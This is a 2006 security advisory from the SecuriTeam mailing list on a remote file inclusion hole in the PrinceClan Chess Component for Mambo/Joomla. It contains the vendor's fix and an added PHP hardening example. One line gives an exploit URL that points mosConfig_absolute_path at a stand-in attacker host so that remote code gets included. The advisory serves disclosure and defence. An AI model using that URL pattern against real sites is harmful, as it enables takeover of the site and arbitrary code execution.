[UNIX] PrinceClan Chess Component File Inclusion
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 31 Jul 2006 18:28:55 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PrinceClan Chess Component File Inclusion
------------------------------------------------------------------------
SUMMARY
The <http://www.princeclan.org/> PrinceClan Chess Component contains a
vulnerability that allows remote attackers to make the product include
arbitrary files into its execution process, and thereby execute arbitrary
code.
DETAILS
Vulnerable Systems:
* PrinceClan Chess Component version 0.8
Exploit:
The following URL will cause the inclusion of a remote file:
http://[host.com]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://evil.txt?
Vendor response:
Due to a recent exploit discovered in Joomla and Mambo, all the Princeclan
components need modification to prevent hackers from taking control of
your site.
Add this line of code immediately after the first <?php tag to each file
with the extension .php:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
Failure to do this will result in your site being vulnerable to attack!
For additional protection, you should also change register_globals and
allow_url_fopen to off in the php.ini file for your site, if your ISP
allows this. This will protect you from the same vulnerability which
exists in many other components, modules, and mambots.
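The guard and the two php.ini settings the vendor describes, shown together as an added PHP example. This is not the vendor's code and not the contents of include.pcchess.php, which the advisory does not reproduce; the commented require_once line and the function name pcchess_hardening_report are assumptions made for illustration.

```php
<?php
// Added example, not the PrinceClan vendor's code. It shows the guard the
// vendor prescribes, why it stops the direct request in the advisory, and a
// check for the two php.ini directives the vendor also recommends turning off.

// 1. The guard, as the first statement after the opening tag.
// Mambo/Joomla's index.php defines _VALID_MOS before it loads any component,
// so a component reached through the CMS passes. A direct request to the
// component file (as in the advisory's URL) never went through index.php, the
// constant is undefined, and execution stops here before any include runs.
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

// 2. Why the direct request was dangerous (assumed shape of the component).
// With register_globals=On, the query parameter mosConfig_absolute_path
// becomes the PHP variable $mosConfig_absolute_path before any code runs.
// A component that builds its include path from that variable, as Mambo
// components commonly did:
//
//     require_once( $mosConfig_absolute_path . '/includes/some_file.php' );
//
// includes whatever the parameter names, including a URL when allow_url_fopen
// is also On. Behind the guard this line only runs when index.php has set the
// variable itself from configuration.php.

// 3. Report the two php.ini directives the vendor recommends disabling.
// ini_get() returns the runtime value as a string; "" and "0" mean off, and
// false means this PHP build does not know the directive at all (register_globals
// was removed in PHP 5.4), which also counts as off.
// Returns e.g. array( 'register_globals' => 'off', 'allow_url_fopen' => 'on' ).
function pcchess_hardening_report()
{
    $report = array();
    foreach ( array( 'register_globals', 'allow_url_fopen' ) as $directive ) {
        $value = ini_get( $directive );
        $report[$directive] = ( $value === false || $value === '' || $value === '0' ) ? 'off' : 'on';
    }
    return $report;
}

// The php.ini lines that produce an all-'off' report:
//
//     register_globals = Off
//     allow_url_fopen  = Off
//
// Usage from an administrator's own script loaded through the CMS so that
// _VALID_MOS is defined:
//
//     foreach ( pcchess_hardening_report() as $directive => $state ) {
//         echo "$directive: $state\n";
//     }
```

The guard removes the direct-request precondition file by file, while the ini settings remove the other two preconditions (request-controlled globals and URL-capable includes) for every file at once, which is why the vendor recommends both. On PHP 5.2 and later the inclusion of URLs is additionally governed by the separate allow_url_include directive, which is Off by default.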
ADDITIONAL INFORMATION
The information has been provided by <mailto:tr_zindan@xxxxxxxxxxxxxxxx>
Tr_ZiNDaN.